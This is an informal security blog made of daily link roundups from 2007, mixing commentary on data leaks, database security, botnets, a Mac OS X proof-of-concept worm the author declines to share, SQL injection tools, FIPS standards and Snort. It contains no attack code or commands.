Ahhhh Monday……well after a long period of rest (read laziness) I’ve decided to get back on track. This means putting the CISSP exam in my sights, going back to the gym (yes my foot is finally feeling better), eating better, and generally getting more involved in security.

Here’s the list:

The Soft Underbelly? – Database Security – Why won’t people learn? I guess this is the kind of thing that keeps us in business.

It not surprising SQL Injection and database hacking are getting more frequent as people ramp up perimeter security more often than not they forget about interior security, software application security and most of all database security.

The irony is, generally THE most important information is stored in corporate databases. Including credit card details, social security information, corporate figures and all the guts that power the white-collar machine.

Oh Look. An Apple WORM. – It was only a matter of time really.

With a few hours work I have put together a proof of concept worm that works on Mac OS X (Intel). I need to get a hold of an older PPC Mac to test that platform but I suspect it will work just fine.

Before I say anymore, because I know some of you will ask, NO I will not send you the PoC or any related details. I wrote this for my own purposes and it will be demonstrated to those who asked me to engage in this work. Yes, I am being compensated for this (Hi Joanna) and yes, Apple will be shown my work. Eventually.

Internet Search Returns Westminster Student Information – I know I probably shouldn’t be surprised…but I am. Why can’t people understand the importance of protecting sensitive information from the public?

Barb, a Westminster College alumnae, received an unpleasant surprise while searching the Internet for her name. Among the results were two files hosted on the Westminster student web server containing the names and Social Security numbers of 100 current and former Westminster students. According to Laura Murphy, Westminster executive director of communications, the files were removed immediately after Barb notified the college and an investigation is on-going. According to Murphy, the files were placed on the web server through an innocent accident and these files were not easily accessible to non-students. However, Westminster is taking this incident seriously and has launched an investigation to help determine what steps need to be in place to prevent such accidents in the future. Westminster has contacted all 100 students and has agreed to pay for one year of credit monitoring for those affected by this incident.

Know Your Enemy: Fast-Flux Service Networks – Interesting article from The Honeynet Project. Check it out.

One of the most active threats we face today on the Internet is cyber-crime. Increasingly capable criminals are constantly developing more sophisticated means of profiting from online criminal activity. This paper demonstrates a growing, sophisticated technique called fast-flux service networks which we are seeing increasingly used in the wild. Fast-flux service networks are a network of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes. These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations.

In this paper we will first provide an overview of what fast-flux service networks are, how they operate, and how the criminal community is leveraging them, including two types which we have designated as single-flux and double-flux service networks. We then provide several examples of fast-flux service networks recently observed in the wild,. Next we detail how fast-flux service network malware operates and present the results of research where a honeypot was purposely infected with a fast-flux agent. Finally we cover how to detect, identify, and mitigate fast-flux service networks, primarily in large networking environments. At the end we supply five appendixes providing additional information for those interested in digging into more technical detail.

For your weekend viewing pleasure – Some botnet videos on YouTube.

It’s Friday the 13th…queue ominous music…but I’m counting on everything going smoothly today. Is it just me or do things always tend to explode on Friday’s?

Here’s the list:

Oracle UK systems accused in ‘SSH hacking spree’ – “Bad Oracle….bad!”

Compromised computers at Oracle UK are listed among the 10 worst offenders on the net for launching attacks on servers which run SSH (secure shell) server software.

Oracle said it is investigating the reported problem, which it is yet to either confirm or refute.
Click here to find out more!

A box (or group of boxes behind a proxy) at Oracle UK is among the worst offenders for launching attacks, according to statistics from servers running DenyHosts software to block SSH brute-force password attacks.

Patching an IPS – 16 months ! – Woah…..

Looking into disclosure timeline [pdf] of Andres Riancho, Cybsec Security Systems the vendor was contacted on 6th February, 2006 already.

The updated TOS version was released on 4th July, 2007, i.e. last week.

I’m not saying 3Com is slow when fixing vulnerabilities, I think this issue was extremely difficult to resolve. Cybsec will “disclose technical details 30 days after publication of pre-advisory”. Let’s wait!

FG-Injector – SQL Injection & Proxy Tool – New tool to test out.

FG-Injector Framework is a set of tools designed to help find SQL injection vulnerabilities in web applications, and help the analyst assess their severity. It includes a powerful proxy feature for intercepting and modifying HTTP requests, and an inference engine for automating SQL injection exploitation.

NIST releases revised FIPS crypto standard for review – Review away my friends….review away!

The latest version of the Federal Information Processing Standard for cryptographic modules, FIPS 140-3, has been released for comment by the National Institute of Standards and Technology.

Comments on the draft, available online at http://csrc.nist.gov/publications/drafts.html#fips140-3 , are due to NIST by Oct. 11.

The current standard, FIPS 140-2, grew out of Federal Standard 1027, General Security Requirements for Equipment, which used the now-outdated Data Encryption Standard. FIPS 140-1 was issued in 1994 with a requirement that it be reviewed every five years. The review and revision process can take several years, and FIPS 140-2 was approved in 2001.

It’s Thursday…one day between me and my precious weekend.

Here’s the list:

Webinar: Cross-Site Request Forgery – Free webinar if you’re interested.

For those interested in learning about Cross-Site Request Forgery (CSRF), WhiteHat is hosting a webinar on July 24, 2007 at 11:00 AM PDT. This is about the basics, in and outs, and solutions in straight forward terms. If you want to attend registration is free.

Secret Military Materials Posted to Unprotected Public Servers – This has “good idea” written all over it.

In the latest government scandal that may make you drop your head in your hands and groan, the Feds have accidentally posted critical information to unsecured public FTP servers — critical as in blueprints, aerial photographs, and geographical surveys that could show Iraqi insurgents entry points and weaknesses at key military sites. The Associated Press published their report this afternoon.
The military may know something about secrecy in the trenches, but next to nothing about security on the Internet. They initially refused to release the information, and then unwittingly posted it online, according to AP:

The military calls it “need-to-know” information that would pose a direct threat to U.S. troops if it were to fall into the hands of terrorists. It’s material so sensitive that officials refused to release the documents when asked.

But it’s already out there, posted carelessly to file servers by government agencies and contractors, accessible to anyone with an Internet connection.

Snort Report 7 Posted – Richard has posted his 7th Snort report. These are always a good read for anyone who uses Snort.

In the last Snort Report we looked at output methods for Snort. These included several ways to write data directly to disk, along with techniques for sending alerts via Syslog and even performing direct database inserts. I recommended not configuring Snort to log directly to a database because Snort is prone to drop packets while performing database inserts. In this edition of the Snort Report I demonstrate how to use unified output, the preferred method for high performance Snort operation.

Fun Intrusion Story – “Major network penetrations of any kind are exceedingly uncommon.” …. HAHAHAHAHAHAH.

Here is an enlightening account of a major intrusion investigation of a cell phone network in Greece.

Tina Bird’s Logs and Law Summary – Good reference material.

Here is the most comprehensive summary of all legal, regulatory, policy and other guidance documents that mention logging, created and maintained by none other than Tina Bird, who seem to be back in logland full time 🙂

Do-It-Yourself Forensics – Exceptionally good article from a legal publication.

All over America, vendors stand ready to solve the e-discovery problems of big, rich companies. But here’s the rub: Most American businesses are small companies that use computers — and along with individual litigants, they’re bound by the same preservation obligations as the Fortune 500, including occasionally needing to preserve forensically significant information on computer hard drives. But what if there’s simply no money to hire an expert, or your client insists that its own IT people must do the job?

Misplaced Class Roster Contained Student Social Security Numbers – Wow….just…..wow.

For the second time in as many months, Texas A&M, Corpus Christi is alerting students over the loss of personal information. This latest incident involved the temporary loss of a class roster containing the names and Social Security numbers of the 49 individuals enrolled in A&M-CC’s Business Law 3310 class. The adjunct professor for the class, Terrell Dahlman, immediately notified School of Business officials and class students when he discovered the roster missing. In an e-mail to students, Dahlman asked each student to check their handouts to see if they accidentally picked up the roster. A student, it turns out, did accidentally pick up the roster and returned the roster to Dhalman during the next class. According to Marshall Collins, vice president for marketing and communications, A&M-CC will not investigate this incident further since the roster was returned. When asked about A&M-CC using Socials Security numbers for identification, Collins replied, “All we have to go by is Social Security numbers. It’s one of the fallacies of the system.”